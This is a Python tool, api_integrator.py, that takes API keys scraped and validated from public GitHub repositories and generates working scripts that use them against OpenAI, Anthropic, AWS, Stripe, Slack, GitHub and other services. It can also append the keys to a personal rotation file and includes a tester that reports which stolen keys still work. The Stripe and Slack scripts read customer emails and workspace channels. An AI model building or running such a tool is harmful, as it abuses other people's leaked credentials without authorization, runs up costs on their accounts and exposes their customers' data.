"""
api_integrator.py — auto-integrates discovered API keys as working agent scripts.

CLI:
  python api_integrator.py [--input output/validated_*.json]
                           [--dry-run]
                           [--inject-llm-rotate]
                           [--out-dir found_agents]

Filter: validation_status == "VALID" AND is_fp_hint == false
        AND severity in {CRITICAL, HIGH}

For each qualifying unique key (deduped by matched_text):
  - Generates a standalone Python agent at found_agents/<provider>_<repo_slug>_agent.py
  - Optionally appends to llm-rotate/found_keys.env (--inject-llm-rotate)

Also builds found_agents/test_all.py — runs each agent with a minimal ping.
"""

import argparse
import glob
import json
import os
import re
import sys
from datetime import datetime, timezone

# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------

LLM_ROTATE_DIR = r"C:\Users\aduad\tools\llm-rotate"
FOUND_KEYS_ENV = os.path.join(LLM_ROTATE_DIR, "found_keys.env")

VALID_SEVERITIES = {"CRITICAL", "HIGH"}

# Map pattern_name (canonical, from validator.py aliases) to provider token
# Also covers raw pattern names from patterns.py
_PROVIDER_MAP: dict[str, str] = {
    # OpenAI
    "openai":               "openai",
    "openai_key":           "openai",
    "openai_api_key":       "openai",
    "openai_project_key":   "openai",
    # Anthropic
    "anthropic":            "anthropic",
    "anthropic_key":        "anthropic",
    "anthropic_api_key":    "anthropic",
    # Groq
    "groq":                 "groq",
    "groq_key":             "groq",
    "groq_api_key":         "groq",
    # HuggingFace
    "huggingface":          "huggingface",
    "huggingface_token":    "huggingface",
    "hf_token":             "huggingface",
    # GitHub
    "github_pat":           "github_pat",
    "github_pat_classic":   "github_pat",
    "github_pat_fine":      "github_pat",
    "github_oauth":         "github_pat",
    "github_token":         "github_pat",
    "github_pat_token":     "github_pat",
    # AWS
    "aws_key":              "aws_key",
    "aws_access_key":       "aws_key",
    "aws_secret_key":       "aws_key",
    "aws_key_id":           "aws_key",
    # Cohere
    "cohere":               "cohere",
    "cohere_key":           "cohere",
    # Mistral
    "mistral":              "mistral",
    "mistral_key":          "mistral",
    # Stripe
    "stripe":               "stripe",
    "stripe_key":           "stripe",
    "stripe_secret_key":    "stripe",
    "stripe_api_key":       "stripe",
    "stripe_secret":        "stripe",
    # xAI / Grok
    "xai":                  "xai",
    "xai_key":              "xai",
    # Google
    "google_api":           "google_api",
    "google_api_key":       "google_api",
    # Slack
    "slack":                "slack",
    "slack_bot_token":      "slack",
    "slack_user_token":     "slack",
    "slack_token":          "slack",
}

# ---------------------------------------------------------------------------
# Agent code templates (one per provider)
# ---------------------------------------------------------------------------

def _tmpl_openai(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Validate before use. Key may be rate-limited or revoked.
import urllib.request, json, os

API_KEY = "{key}"
BASE_URL = "https://api.openai.com/v1"

def chat(prompt: str, model: str = "gpt-4o-mini") -> str:
    data = json.dumps({{"model": model, "messages": [{{"role": "user", "content": prompt}}], "max_tokens": 512}}).encode()
    req = urllib.request.Request(f"{{BASE_URL}}/chat/completions", data=data,
        headers={{"Authorization": f"Bearer {{API_KEY}}", "Content-Type": "application/json"}})
    with urllib.request.urlopen(req, timeout=30) as r:
        return json.loads(r.read())["choices"][0]["message"]["content"]

def list_models() -> list:
    req = urllib.request.Request(f"{{BASE_URL}}/models",
        headers={{"Authorization": f"Bearer {{API_KEY}}"}})
    with urllib.request.urlopen(req, timeout=15) as r:
        return [m["id"] for m in json.loads(r.read())["data"]]

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello, what models do you have?"
    print(chat(prompt))
'''


def _tmpl_anthropic(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Validate before use. Key may be rate-limited or revoked.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://api.anthropic.com/v1"
MODEL = "claude-haiku-4-5-20251001"

def chat(prompt: str) -> str:
    data = json.dumps({{
        "model": MODEL,
        "max_tokens": 512,
        "messages": [{{"role": "user", "content": prompt}}],
    }}).encode()
    req = urllib.request.Request(f"{{BASE_URL}}/messages", data=data, headers={{
        "x-api-key": API_KEY,
        "anthropic-version": "2023-06-01",
        "Content-Type": "application/json",
    }})
    with urllib.request.urlopen(req, timeout=30) as r:
        return json.loads(r.read())["content"][0]["text"]

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello!"
    print(chat(prompt))
'''


def _tmpl_groq(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Validate before use. Key may be rate-limited or revoked.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://api.groq.com/openai/v1"
MODEL = "llama-3.3-70b-versatile"

def chat(prompt: str) -> str:
    data = json.dumps({{"model": MODEL, "messages": [{{"role": "user", "content": prompt}}], "max_tokens": 512}}).encode()
    req = urllib.request.Request(f"{{BASE_URL}}/chat/completions", data=data,
        headers={{"Authorization": f"Bearer {{API_KEY}}", "Content-Type": "application/json"}})
    with urllib.request.urlopen(req, timeout=30) as r:
        return json.loads(r.read())["choices"][0]["message"]["content"]

def list_models() -> list:
    req = urllib.request.Request(f"{{BASE_URL}}/models",
        headers={{"Authorization": f"Bearer {{API_KEY}}"}})
    with urllib.request.urlopen(req, timeout=15) as r:
        return [m["id"] for m in json.loads(r.read())["data"]]

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello!"
    print(chat(prompt))
'''


def _tmpl_huggingface(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Validate before use. Key may be rate-limited or revoked.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://api-inference.huggingface.co/models/mistralai/Mistral-7B-Instruct-v0.1"

def chat(prompt: str) -> str:
    data = json.dumps({{"inputs": prompt, "parameters": {{"max_new_tokens": 512}}}}).encode()
    req = urllib.request.Request(BASE_URL, data=data,
        headers={{"Authorization": f"Bearer {{API_KEY}}", "Content-Type": "application/json"}})
    with urllib.request.urlopen(req, timeout=60) as r:
        result = json.loads(r.read())
        if isinstance(result, list):
            return result[0].get("generated_text", str(result))
        return str(result)

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello!"
    print(chat(prompt))
'''


def _tmpl_github_pat(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# GitHub OSINT / search agent. READ-ONLY operations only.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://api.github.com"

def _req(url: str) -> dict | list:
    req = urllib.request.Request(url, headers={{
        "Authorization": f"Bearer {{API_KEY}}",
        "Accept": "application/vnd.github+json",
        "X-GitHub-Api-Version": "2022-11-28",
    }})
    with urllib.request.urlopen(req, timeout=15) as r:
        return json.loads(r.read())

def whoami() -> dict:
    return _req(f"{{BASE_URL}}/user")

def list_repos(username: str | None = None, limit: int = 10) -> list:
    if username:
        url = f"{{BASE_URL}}/users/{{username}}/repos?per_page={{limit}}&sort=updated"
    else:
        url = f"{{BASE_URL}}/user/repos?per_page={{limit}}&sort=updated"
    return _req(url)

def search_code(query: str, limit: int = 5) -> list:
    import urllib.parse
    q = urllib.parse.quote(query)
    data = _req(f"{{BASE_URL}}/search/code?q={{q}}&per_page={{limit}}")
    return data.get("items", [])

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        results = search_code(" ".join(sys.argv[1:]))
        for item in results:
            print(item.get("html_url", item))
    else:
        user = whoami()
        print(f"Authenticated as: {{user.get('login')}} ({{user.get('name')}})")
        repos = list_repos(limit=5)
        for r in repos:
            print(f"  {{r['full_name']}} — {{r.get('stargazers_count', 0)}} stars")
'''


def _tmpl_aws_key(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# AWS agent — STS GetCallerIdentity (READ-ONLY, no cost, no side-effects).
# Requires both Access Key ID and Secret Key. This script holds only what was found.
# If only the Access Key ID (AKIA...) was captured, set AWS_SECRET_ACCESS_KEY in env.
import urllib.request, json, os, hashlib, hmac, datetime

ACCESS_KEY = "{key}"
SECRET_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY", "")

def _sign(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()

def _signature_key(key: str, date_stamp: str, region: str, service: str) -> bytes:
    k_date    = _sign(("AWS4" + key).encode("utf-8"), date_stamp)
    k_region  = _sign(k_date, region)
    k_service = _sign(k_region, service)
    return _sign(k_service, "aws4_request")

def get_caller_identity() -> dict:
    if not SECRET_KEY:
        return {{"error": "AWS_SECRET_ACCESS_KEY not set — cannot sign request"}}
    region, service = "us-east-1", "sts"
    t = datetime.datetime.utcnow()
    amz_date = t.strftime("%Y%m%dT%H%M%SZ")
    date_stamp = t.strftime("%Y%m%d")
    host = f"sts.{{region}}.amazonaws.com"
    endpoint = f"https://{{host}}/"
    payload = "Action=GetCallerIdentity&Version=2011-06-15"
    content_type = "application/x-www-form-urlencoded"
    payload_hash = hashlib.sha256(payload.encode("utf-8")).hexdigest()
    canonical_headers = f"content-type:{{content_type}}\\nhost:{{host}}\\nx-amz-date:{{amz_date}}\\n"
    signed_headers = "content-type;host;x-amz-date"
    canonical_request = f"POST\\n/\\n\\n{{canonical_headers}}\\n{{signed_headers}}\\n{{payload_hash}}"
    cred_scope = f"{{date_stamp}}/{{region}}/{{service}}/aws4_request"
    string_to_sign = f"AWS4-HMAC-SHA256\\n{{amz_date}}\\n{{cred_scope}}\\n{{hashlib.sha256(canonical_request.encode()).hexdigest()}}"
    signing_key = _signature_key(SECRET_KEY, date_stamp, region, service)
    signature = hmac.new(signing_key, string_to_sign.encode("utf-8"), hashlib.sha256).hexdigest()
    auth_header = (
        f"AWS4-HMAC-SHA256 Credential={{ACCESS_KEY}}/{{cred_scope}}, "
        f"SignedHeaders={{signed_headers}}, Signature={{signature}}"
    )
    req = urllib.request.Request(endpoint, data=payload.encode(), headers={{
        "Content-Type": content_type,
        "X-Amz-Date": amz_date,
        "Authorization": auth_header,
    }}, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=15) as r:
            return {{"raw": r.read().decode()}}
    except urllib.error.HTTPError as e:
        return {{"error": e.code, "body": e.read().decode()[:500]}}

if __name__ == "__main__":
    result = get_caller_identity()
    print(json.dumps(result, indent=2))
'''


def _tmpl_cohere(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Validate before use. Key may be rate-limited or revoked.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://api.cohere.ai/v1"

def chat(prompt: str) -> str:
    data = json.dumps({{"message": prompt, "max_tokens": 512}}).encode()
    req = urllib.request.Request(f"{{BASE_URL}}/chat", data=data, headers={{
        "Authorization": f"Bearer {{API_KEY}}",
        "Content-Type": "application/json",
        "X-Client-Name": "api_integrator",
    }})
    with urllib.request.urlopen(req, timeout=30) as r:
        return json.loads(r.read())["text"]

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello!"
    print(chat(prompt))
'''


def _tmpl_mistral(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Validate before use. Key may be rate-limited or revoked.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://api.mistral.ai/v1"
MODEL = "mistral-small-latest"

def chat(prompt: str) -> str:
    data = json.dumps({{"model": MODEL, "messages": [{{"role": "user", "content": prompt}}], "max_tokens": 512}}).encode()
    req = urllib.request.Request(f"{{BASE_URL}}/chat/completions", data=data, headers={{
        "Authorization": f"Bearer {{API_KEY}}",
        "Content-Type": "application/json",
    }})
    with urllib.request.urlopen(req, timeout=30) as r:
        return json.loads(r.read())["choices"][0]["message"]["content"]

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello!"
    print(chat(prompt))
'''


def _tmpl_stripe(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# READ-ONLY Stripe agent — lists customers (GET only, no writes).
import urllib.request, json, base64

API_KEY = "{key}"
BASE_URL = "https://api.stripe.com/v1"

def _auth_header() -> str:
    creds = base64.b64encode(f"{{API_KEY}}:".encode()).decode()
    return f"Basic {{creds}}"

def list_customers(limit: int = 3) -> list:
    req = urllib.request.Request(
        f"{{BASE_URL}}/customers?limit={{limit}}",
        headers={{"Authorization": _auth_header()}},
    )
    with urllib.request.urlopen(req, timeout=15) as r:
        return json.loads(r.read()).get("data", [])

def account_info() -> dict:
    req = urllib.request.Request(
        f"{{BASE_URL}}/account",
        headers={{"Authorization": _auth_header()}},
    )
    with urllib.request.urlopen(req, timeout=15) as r:
        return json.loads(r.read())

if __name__ == "__main__":
    info = account_info()
    print(f"Account: {{info.get('id')}} — {{info.get('email')}}")
    customers = list_customers()
    print(f"Recent customers ({{len(customers)}}):")
    for c in customers:
        print(f"  {{c.get('id')}} — {{c.get('email')}}")
'''


def _tmpl_xai(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Validate before use. Key may be rate-limited or revoked.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://api.x.ai/v1"
MODEL = "grok-3-mini"

def chat(prompt: str) -> str:
    data = json.dumps({{"model": MODEL, "messages": [{{"role": "user", "content": prompt}}], "max_tokens": 512}}).encode()
    req = urllib.request.Request(f"{{BASE_URL}}/chat/completions", data=data, headers={{
        "Authorization": f"Bearer {{API_KEY}}",
        "Content-Type": "application/json",
    }})
    with urllib.request.urlopen(req, timeout=30) as r:
        return json.loads(r.read())["choices"][0]["message"]["content"]

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello!"
    print(chat(prompt))
'''


def _tmpl_google_api(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Google / Gemini API agent. Uses Gemini 1.5 Flash via generateContent.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://generativelanguage.googleapis.com/v1beta"
MODEL = "gemini-1.5-flash"

def chat(prompt: str) -> str:
    data = json.dumps({{"contents": [{{"parts": [{{"text": prompt}}]}}]}}).encode()
    url = f"{{BASE_URL}}/models/{{MODEL}}:generateContent?key={{API_KEY}}"
    req = urllib.request.Request(url, data=data, headers={{"Content-Type": "application/json"}})
    with urllib.request.urlopen(req, timeout=30) as r:
        result = json.loads(r.read())
        return result["candidates"][0]["content"]["parts"][0]["text"]

if __name__ == "__main__":
    import sys
    prompt = " ".join(sys.argv[1:]) or "Hello!"
    print(chat(prompt))
'''


def _tmpl_slack(key: str, repo: str, path: str) -> str:
    return f'''\
# Auto-generated by api_integrator.py — found in {repo}/{path}
# Slack READ-ONLY agent — auth.test + channel listing.
import urllib.request, json

API_KEY = "{key}"
BASE_URL = "https://slack.com/api"

def _get(method: str) -> dict:
    req = urllib.request.Request(f"{{BASE_URL}}/{{method}}",
        headers={{"Authorization": f"Bearer {{API_KEY}}"}})
    with urllib.request.urlopen(req, timeout=15) as r:
        return json.loads(r.read())

def whoami() -> dict:
    return _get("auth.test")

def list_channels(limit: int = 5) -> list:
    data = _get(f"conversations.list?limit={{limit}}&types=public_channel")
    return data.get("channels", [])

if __name__ == "__main__":
    info = whoami()
    print(f"ok={{info.get('ok')}} team={{info.get('team')}} user={{info.get('user')}}")
    channels = list_channels()
    print(f"Channels ({{len(channels)}}):")
    for ch in channels:
        print(f"  #{{ch.get('name')}} — {{ch.get('num_members', 0)}} members")
'''


_TEMPLATES: dict[str, callable] = {
    "openai":      _tmpl_openai,
    "anthropic":   _tmpl_anthropic,
    "groq":        _tmpl_groq,
    "huggingface": _tmpl_huggingface,
    "github_pat":  _tmpl_github_pat,
    "aws_key":     _tmpl_aws_key,
    "cohere":      _tmpl_cohere,
    "mistral":     _tmpl_mistral,
    "stripe":      _tmpl_stripe,
    "xai":         _tmpl_xai,
    "google_api":  _tmpl_google_api,
    "slack":       _tmpl_slack,
}

# ---------------------------------------------------------------------------
# test_all.py template
# ---------------------------------------------------------------------------

_TEST_ALL_TEMPLATE = '''\
"""
test_all.py — auto-generated by api_integrator.py
Runs each found agent with a minimal ping and reports WORKING / FAILED.

Usage:
  python found_agents/test_all.py
  python found_agents/test_all.py --timeout 20
"""
import os
import sys
import time
import subprocess
import argparse

AGENTS_DIR = os.path.dirname(os.path.abspath(__file__))

PING_ARGS: dict[str, list[str]] = {
    "openai":      ["What is 1+1? Answer in one word."],
    "anthropic":   ["What is 1+1? Answer in one word."],
    "groq":        ["What is 1+1? Answer in one word."],
    "huggingface": ["What is 1+1?"],
    "github_pat":  [],  # default: whoami
    "aws_key":     [],  # default: get_caller_identity
    "cohere":      ["What is 1+1? Answer in one word."],
    "mistral":     ["What is 1+1? Answer in one word."],
    "stripe":      [],  # default: account_info
    "xai":         ["What is 1+1? Answer in one word."],
    "google_api":  ["What is 1+1? Answer in one word."],
    "slack":       [],  # default: whoami
}

def _provider(agent_name: str) -> str:
    """Extract provider prefix from filename."""
    return agent_name.split("_")[0]

def run_agent(script_path: str, timeout: int) -> tuple[bool, float, str]:
    """Returns (working, elapsed_s, detail)."""
    agent_name = os.path.basename(script_path)
    provider = _provider(agent_name)
    extra_args = PING_ARGS.get(provider, [])
    cmd = [sys.executable, script_path] + extra_args
    t0 = time.monotonic()
    try:
        result = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=timeout,
        )
        elapsed = time.monotonic() - t0
        if result.returncode == 0 and result.stdout.strip():
            return True, elapsed, result.stdout.strip()[:120]
        stderr = result.stderr.strip()[:200] or f"exit {result.returncode}"
        return False, elapsed, stderr
    except subprocess.TimeoutExpired:
        return False, timeout, "Timeout"
    except Exception as exc:
        return False, time.monotonic() - t0, str(exc)[:200]

def main():
    parser = argparse.ArgumentParser(description="Test all found agent scripts.")
    parser.add_argument("--timeout", type=int, default=30,
                        help="Per-agent timeout in seconds (default: 30)")
    args = parser.parse_args()

    agents = sorted(
        f for f in os.listdir(AGENTS_DIR)
        if f.endswith("_agent.py")
    )

    if not agents:
        print("No agent scripts found in", AGENTS_DIR)
        sys.exit(0)

    print(f"Testing {len(agents)} agent(s) — timeout={args.timeout}s")
    print("-" * 70)

    working, failed = 0, 0
    for agent_file in agents:
        script_path = os.path.join(AGENTS_DIR, agent_file)
        ok, elapsed, detail = run_agent(script_path, args.timeout)
        status = "WORKING" if ok else "FAILED "
        marker = "[WORKING]" if ok else "[FAILED] "
        print(f"{marker} {agent_file:<45} {elapsed:.1f}s  {detail}")
        if ok:
            working += 1
        else:
            failed += 1

    print("-" * 70)
    print(f"Results: {working} working, {failed} failed / {len(agents)} total")

if __name__ == "__main__":
    main()
'''

# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------


def _resolve_provider(finding: dict) -> str | None:
    """Return canonical provider name or None if unsupported."""
    # Check resolved name first (set by validator.py)
    resolved = finding.get("pattern_name_resolved", "")
    raw = finding.get("pattern_name", "")
    for candidate in [resolved.lower(), raw.lower()]:
        if candidate in _PROVIDER_MAP:
            return _PROVIDER_MAP[candidate]
    return None


def _repo_slug(repo: str) -> str:
    """Convert 'owner/repo' to 'owner__repo', sanitized for filenames."""
    slug = repo.replace("/", "__")
    slug = re.sub(r"[^\w\-.]", "_", slug)
    return slug


def _agent_filename(provider: str, repo: str) -> str:
    return f"{provider}_{_repo_slug(repo)}_agent.py"


def _env_var_name(provider: str, idx: int) -> str:
    upper = provider.upper()
    mapping = {
        "OPENAI":      "OPENAI_API_KEY",
        "ANTHROPIC":   "ANTHROPIC_API_KEY",
        "GROQ":        "GROQ_API_KEY",
        "HUGGINGFACE": "HUGGINGFACE_TOKEN",
        "GITHUB_PAT":  "GITHUB_TOKEN",
        "AWS_KEY":     "AWS_ACCESS_KEY_ID",
        "COHERE":      "COHERE_API_KEY",
        "MISTRAL":     "MISTRAL_API_KEY",
        "STRIPE":      "STRIPE_SECRET_KEY",
        "XAI":         "XAI_API_KEY",
        "GOOGLE_API":  "GOOGLE_API_KEY",
        "SLACK":       "SLACK_BOT_TOKEN",
    }
    base = mapping.get(upper, f"{upper}_KEY")
    return f"{base}_FOUND_{idx:03d}"


def _load_findings(input_pattern: str) -> list[dict]:
    """Expand glob and load all matching JSON files."""
    paths = sorted(glob.glob(input_pattern))
    if not paths:
        # Try as literal path
        if os.path.isfile(input_pattern):
            paths = [input_pattern]
        else:
            print(f"ERROR: no files matched: {input_pattern}", file=sys.stderr)
            sys.exit(1)
    findings = []
    for p in paths:
        with open(p, encoding="utf-8") as fh:
            data = json.load(fh)
        if isinstance(data, list):
            findings.extend(data)
        else:
            findings.append(data)
    return findings


def _filter_findings(findings: list[dict]) -> list[dict]:
    """Keep only VALID, not FP, CRITICAL/HIGH findings."""
    out = []
    for f in findings:
        if f.get("validation_status") != "VALID":
            continue
        if f.get("is_fp_hint", True):
            continue
        if f.get("severity", "") not in VALID_SEVERITIES:
            continue
        out.append(f)
    return out


def _dedup(findings: list[dict]) -> list[dict]:
    """Deduplicate by matched_text; keep first occurrence."""
    seen: set[str] = set()
    out = []
    for f in findings:
        key = f.get("matched_text", "").strip()
        if not key or key in seen:
            continue
        seen.add(key)
        out.append(f)
    return out


def _print_table(rows: list[dict]) -> None:
    """Print a summary table of what will be generated."""
    if not rows:
        print("  (no qualifying findings)")
        return
    header = f"  {'#':<3} {'Provider':<14} {'Severity':<10} {'Repo':<35} {'Key (truncated)':<20}"
    print(header)
    print("  " + "-" * (len(header) - 2))
    for i, r in enumerate(rows, 1):
        provider = _resolve_provider(r) or "unknown"
        key = r.get("matched_text", "")
        trunc = key[:8] + "..." + key[-4:] if len(key) > 15 else key
        repo = r.get("repo", "")[:33]
        sev = r.get("severity", "")
        print(f"  {i:<3} {provider:<14} {sev:<10} {repo:<35} {trunc:<20}")


# ---------------------------------------------------------------------------
# Core logic
# ---------------------------------------------------------------------------


def integrate(
    findings: list[dict],
    out_dir: str,
    dry_run: bool,
    inject_llm_rotate: bool,
) -> list[dict]:
    """
    Generate agent files for each qualifying finding.
    Returns list of result dicts with: provider, repo, path, agent_file, action.
    """
    os.makedirs(out_dir, exist_ok=True)

    today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
    results = []
    env_idx_counter: dict[str, int] = {}

    for finding in findings:
        provider = _resolve_provider(finding)
        if provider is None:
            pattern = finding.get("pattern_name", "?")
            print(f"  [SKIP] unsupported provider: {pattern}")
            continue

        tmpl_fn = _TEMPLATES.get(provider)
        if tmpl_fn is None:
            print(f"  [SKIP] no template for provider: {provider}")
            continue

        key = finding["matched_text"].strip()
        repo = finding.get("repo", "unknown/unknown")
        path = finding.get("path", "unknown")
        agent_file = _agent_filename(provider, repo)
        agent_path = os.path.join(out_dir, agent_file)

        code = tmpl_fn(key, repo, path)

        if dry_run:
            action = f"DRY-RUN: would write {agent_path}"
            print(f"  [DRY-RUN] {provider:<14} {repo} -> {agent_file}")
        else:
            with open(agent_path, "w", encoding="utf-8") as fh:
                fh.write(code)
            action = f"wrote {agent_path}"
            print(f"  [CREATED] {provider:<14} {repo} -> {agent_file}")

        # --inject-llm-rotate: append to found_keys.env
        if inject_llm_rotate and not dry_run:
            env_idx_counter[provider] = env_idx_counter.get(provider, 0) + 1
            var_name = _env_var_name(provider, env_idx_counter[provider])
            comment = f"# Found by github-scraper — {today} — {repo} {path}"
            line = f"{var_name}={key}"
            os.makedirs(os.path.dirname(FOUND_KEYS_ENV), exist_ok=True)
            with open(FOUND_KEYS_ENV, "a", encoding="utf-8") as fh:
                fh.write(f"\n{comment}\n{line}\n")
            print(f"    -> appended {var_name} to {FOUND_KEYS_ENV}")

        results.append({
            "provider": provider,
            "repo": repo,
            "path": path,
            "agent_file": agent_file,
            "action": action,
            "key_truncated": key[:8] + "..." + key[-4:] if len(key) > 15 else key,
        })

    return results


def _write_test_all(out_dir: str, dry_run: bool) -> None:
    test_path = os.path.join(out_dir, "test_all.py")
    if dry_run:
        print(f"  [DRY-RUN] would write {test_path}")
        return
    with open(test_path, "w", encoding="utf-8") as fh:
        fh.write(_TEST_ALL_TEMPLATE)
    print(f"  [CREATED] test_all.py -> {test_path}")


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------


def main():
    parser = argparse.ArgumentParser(
        description="Auto-integrate discovered API keys as working agent scripts."
    )
    parser.add_argument(
        "--input",
        default=r"output\validated_*.json",
        help="Input validated findings JSON (glob supported, default: output/validated_*.json)",
    )
    parser.add_argument(
        "--dry-run",
        action="store_true",
        help="Print what would be generated without writing files",
    )
    parser.add_argument(
        "--inject-llm-rotate",
        action="store_true",
        help=f"Append found keys to {FOUND_KEYS_ENV}",
    )
    parser.add_argument(
        "--out-dir",
        default="found_agents",
        help="Output directory for agent scripts (default: found_agents)",
    )
    args = parser.parse_args()

    # Resolve out_dir relative to this script's directory
    script_dir = os.path.dirname(os.path.abspath(__file__))
    out_dir = args.out_dir if os.path.isabs(args.out_dir) else os.path.join(script_dir, args.out_dir)

    # Resolve input glob relative to script dir
    input_pattern = args.input if os.path.isabs(args.input) else os.path.join(script_dir, args.input)

    print("api_integrator.py")
    print(f"  input:           {input_pattern}")
    print(f"  out_dir:         {out_dir}")
    print(f"  dry_run:         {args.dry_run}")
    print(f"  inject-llm-rotate: {args.inject_llm_rotate}")
    print("-" * 70)

    # Load and filter findings
    print("Loading findings...")
    all_findings = _load_findings(input_pattern)
    print(f"  total loaded:    {len(all_findings)}")

    valid = _filter_findings(all_findings)
    print(f"  VALID+CRIT/HIGH: {len(valid)}")

    unique = _dedup(valid)
    print(f"  unique keys:     {len(unique)}")
    print()

    if not unique:
        print("No qualifying findings — nothing to generate.")
        print()
        print("Summary:")
        print("  0 agents generated")
        return

    print("Qualifying findings:")
    _print_table(unique)
    print()

    print("Generating agents...")
    results = integrate(unique, out_dir, args.dry_run, args.inject_llm_rotate)

    print()
    print("Writing test_all.py...")
    _write_test_all(out_dir, args.dry_run)

    print()
    print("=" * 70)
    print(f"Summary: {len(results)} agent(s) generated in {out_dir}")
    if args.dry_run:
        print("(dry-run — no files written)")
    if args.inject_llm_rotate and not args.dry_run:
        print(f"Keys appended to: {FOUND_KEYS_ENV}")
    print()

    # Print final table
    if results:
        print(f"  {'#':<3} {'Provider':<14} {'Repo':<35} {'File':<45} {'Key'}")
        print("  " + "-" * 110)
        for i, r in enumerate(results, 1):
            print(
                f"  {i:<3} {r['provider']:<14} {r['repo']:<35} "
                f"{r['agent_file']:<45} {r['key_truncated']}"
            )


if __name__ == "__main__":
    main()
